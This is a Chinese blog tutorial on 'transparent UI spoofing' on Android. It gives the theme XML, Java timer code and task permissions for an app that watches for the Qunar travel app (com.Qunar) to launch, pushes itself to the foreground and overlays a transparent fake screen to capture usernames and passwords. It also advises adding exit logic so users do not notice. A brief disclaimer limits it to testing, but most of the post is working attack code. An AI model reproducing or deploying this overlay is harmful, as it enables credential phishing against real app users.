android透明UI欺骗的简单实现

最新推荐文章于 2023-05-12 11:10:12 发布
最新推荐文章于 2023-05-12 11:10:12 发布
阅读量834 收藏
点赞数 1
文章标签: android 编程 透明ui欺骗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SHENMEGUI_32/article/details/51566712
版权

1.应用使用方法

将本应用运行在后台,当特定的应用启动时,本应用会自动弹出背景透明的界面,覆盖在原应用上,特别是当被覆盖应用启动时是密码输入界面时,透明UI可以欺骗用户,以达到获取用户名、密码等个人信息的目的。

2.实现原理

本程序使用到透明背景界面的创建、应用后台转前台、定时查找当前运行task和app等功能。

3.实现步骤

3.1实现透明UI

首先实现自己定义的透明主题,在res/values/styles.xml中定义style如下: 
<style name="shenmegui_transparent">
    <item name="android:windowBackground">@color/transparent</item>
    <item name="android:windowNoTitle">true</item>
    <item name="android:windowIsTranslucent">true</item>
    <item name="android:windowAnimationStyle">@android:style/Animation.Translucent</item>
</style>

其中 color/transparent是定义在res/values/colors.xml中的透明色,所以在res/values/colors.xml中添加: 

<color name="transparent">#0000</color>
最后在AndroidManifest.xml文件中引入自己的主题: 
android:theme="@style/shenmegui_transparent">
这样,我们的界面就是透明的了。

3.2实现定时查看当前运行程序功能

当被伪造的程序开始运行时,需要弹出伪造界面,故需不断的查看当前运行的程序,本程序使用timer实现。当当前运行程序是欲覆盖应用时,使用moveTaskToFront将应用欺骗界面显示出来。具体程序如下: 
public void timer(final Context context){
        Timer timer=new Timer();
        final TimerTask timerTask=new TimerTask() {
        @Override
        public void run() {
            ActivityManager myActivityManager= (ActivityManager) context.getSystemService(context.ACTIVITY_SERVICE);
            List<ActivityManager.RunningTaskInfo> list_task=myActivityManager.getRunningTasks(100);
            List<ActivityManager.RunningAppProcessInfo> list=myActivityManager.getRunningAppProcesses();

            //若当前运行程序为“去哪儿”,则调用欺骗界面。
            if (list.get(0).processName.equals("com.Qunar")){
                //为了使“去哪儿”程序完全呈现出来,暂停本程序6s。此处不暂停可用来实现程序锁功能。
                try{
                    Thread.sleep(6000);
                    Log.i("shenmegui","成功暂停6s");
                }catch (InterruptedException e){
                    e.printStackTrace();
                }
                //遍历当前运行task,找到本程序所在task,移至前台。
                for (ActivityManager.RunningTaskInfo i:list_task
                     ) {
                    if (i.topActivity.getPackageName().equals(context.getPackageName())){
                        myActivityManager.moveTaskToFront(i.id,0);
                    }
                }
                //调用欺骗界面。
                Intent intent=new Intent();
                intent.setClass(context,SecondActivity.class);
               // intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                context.startActivity(intent);
                this.cancel();
            }
            Log.i("processName", list.get(0).processName);
        }
    };

    timer.schedule(timerTask,0,4*1000);
}

其中SecondActivity.class即为弹出的透明UI欺骗界面。具体SecondActivity类的写法就是根据被模仿的程序界面不同而不同了,但是要注意,要在SecondActivity中写退出程序的语句,否则用户不能在透明界面进一步操作,就会被用户发现。
最后还要注意在AndroidManifest.xml中写上权限的声明: 
    <uses-permission android:name="android.permission.REORDER_TASKS"></uses-permission>
    <uses-permission android:name="android.permission.GET_TASKS"></uses-permission>

4.郑重声明

本透明UI欺骗程序只能用于正当用途,比如只用来测试目标软件是否具有防止被透明UI欺骗的能力。本文档只作为本人日后参考和android漏洞测试人员最初级学习参考。



SHENMEGUI_32
关注
Android 卫星菜单 简单实现
09-15
属性动画是Android 3.0(API Level 11)引入的一种机制,它可以独立于UI线程运行,为视图对象提供平滑、连续的动画效果。与View动画不同,属性动画能够真正改变对象的属性,而不仅仅是视觉上的欺骗。 首先,我们...
透明UI设计
天龙的博客
12-27 1162
之前学习java和android时,在app市场,找到一个不错的学习软件Java学习手册、Android学习手册,挺喜欢它的那个透明UI设计 现仿照它自己做了一个,加深自己的功力。 这个App一共用到以下几种功能: 1.GridView 九宫格(显示item) 2.ViewPage+Fragment(经典的滑动切换菜单) 3.ObjectAnimator 动画(控制
Android设置窗体透明
最新发布
leveretz的博客
05-12 962
Android设置窗体透明
设置Android窗口透明
hopehe888999的专栏
01-22 980
getWindow().setFormat(PixelFormat.TRANSLUCENT)
安卓弹窗(Dialog)设置透明背景
m0_46366678的博客
02-07 3564
Android Dialog设置透明背景
Android设置透明、半透明等效果
来啊 快活啊
06-16 5579
设置透明效果 大概有三种1、用android系统的透明效果 Java代码 android:background="@android:color/transparent" 例如 设置按钮 Java代码
BAnim_FilpLibrary.rar_android_自定义动画
09-20
视图动画则主要针对视图进行,包括旋转、缩放、平移和透明度变化等,但这些动画并不改变视图的实际状态,仅产生视觉上的欺骗效果。 二、BAnim_FlipLibrary概述 BAnim_FlipLibrary是一个专为Android开发的自定义动画...
Android系统点击劫持攻防技术研究.pdf
09-21
点击劫持,作为一种利用多层透明或重叠界面欺骗用户进行非预期点击的攻击手段,近年来在Web环境中崭露头角,并随着移动互联网的普及,逐渐在Android系统中变得尤为突出。由于其高度的隐蔽性和危害性,对用户数据安全...
Android源码——动画顺序播放源码.7z
10-08
视图动画是Android早期引入的动画系统,主要通过改变View对象的透明度、大小、位置等属性来实现动画效果。这种动画不改变View的实际状态,只是视觉上的欺骗。要实现视图动画的顺序播放,可以使用AnimationSet类,它...
android 设置窗口透明效果,android - 如何将对话框窗口背景设置为透明,而不影响其边距...
weixin_36247139的博客
05-26 745
当前,我有以下对话框,我将对其项目执行扩展/折叠动画。 该对话框是通过以下代码创建的import android.support.v7.app.AlertDialog;final AlertDialog.Builder builder = new AlertDialog.Builder(activity);final AlertDialog dialog = builder.setView(vie...
Android全屏与透明状态栏
weixin_33795806的博客
11-01 292
前言 Android沉浸式与全屏是不一样的两种主题,接下来我们看看吧 Android实现全屏 通过主题属性来实现 &lt;style name="FullScreenTheme"&gt; &lt;item name="android:windowNoTitle"&gt;true&lt;/item&gt; &lt;item name="android:windowFullscreen...
ARP欺骗原理详细介绍
墨痕诉清风的博客
09-06 2986
一台主机A如果要向目标主机B发送数据,无论主机B在本网段还是在远程网络,这些需要发出去的数据包中需要四样必不可少的地址,那就是源IP地址和源MAC地址,以及目标IP地址和目标MAC地址,当主机B在封装数据包时,自己的IP地址和MAC地址可以正确地,轻易地封装进去,目标IP自己也知道,可以封装进去,可是,关键就在目标MAC该如何得来,由于主机A曾经和主机B发生过通信,曾经通过ARP得...
Android实现界面透明的方法汇总
笑傲人生的博客
01-07 607
Android中,有时需要我们做出透明的效果来满足用户更好的体验,大概总结下,在Android中有2种实现方法: 1.在配置文件内的activity属性上添加:  android:theme="@android:style/Theme.Translucent"  就ok 2.在res/string下创建res-values-colors.xml <?xml version="1.0" enco
android透明度大全,Android实现界面透明的方法汇总
weixin_42134038的博客
05-26 665
Android中,有时需要我们做出透明的效果来满足用户更好的体验,大概总结下,在Android中有2种实现方法:1.在配置文件内的activity属性上添加:android:theme="@android:style/Theme.Translucent"就ok2.在res/string下创建res-values-colors.xmlencoding="utf-8"?>name="tran...
android透明度 黑暗度 模糊度 设置
王月莹的专栏
12-20 6244
设置透明度(这是窗体本身的透明度,非背景) 1 WindowManager.LayoutParams lp=getWindow().getAttributes(); 2 lp.alpha=0.3f; 3 getWindow().setAttributes(lp); alpha在0.0f到1.0f之间。1.0完全不透明,0.0f完全透明 设置黑暗度 1 WindowMan
android设置悬浮窗口的透明度,Android TransparentActivity 悬浮窗兼容方案
weixin_34221197的博客
05-27 1984
一、方案说明方案对比:Overlay方案:1、 <> overlay悬浮窗功能比较强大,支持很多交互。2、部分手机(如小米)不支持指纹识别等安全校验,因为有悬浮窗权限的app对需要指纹识别的app存在安全风险。3、需要申请权限overlay权限、存在兼容问题,没有权限只能使用Toast去兼容,弹窗会自动消失。4、支持多级弹窗TransparentActivity方案:1、支持场景有限,...
ARP欺骗之——原理分析
温柔小薛的博客
05-08 4024
今天学的知识不多,忙了一天学校的东西,做了一上午路由实验,下午做了个社会调查报告,晚上才腾出时间学一些,然后得知明儿竟然要补五一的课,然而我周二是刚好没课的哈哈,下了两天雨在家里出不去,憋坏了,明儿去跑跑步吧 ARP攻击之原理分析 什么是ARP协议 ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。注意:ARP是工作在数据链路层中 在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目
Android UI进阶:实现ListView的下拉加载
"androidUI进阶之实现listview的下拉加载和分页加载,以及listview中checkbox的多选与记录技术" 在Android UI开发中,ListView是一个非常重要的组件,用于展示大量的数据列表。本篇将深入探讨如何实现ListView的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值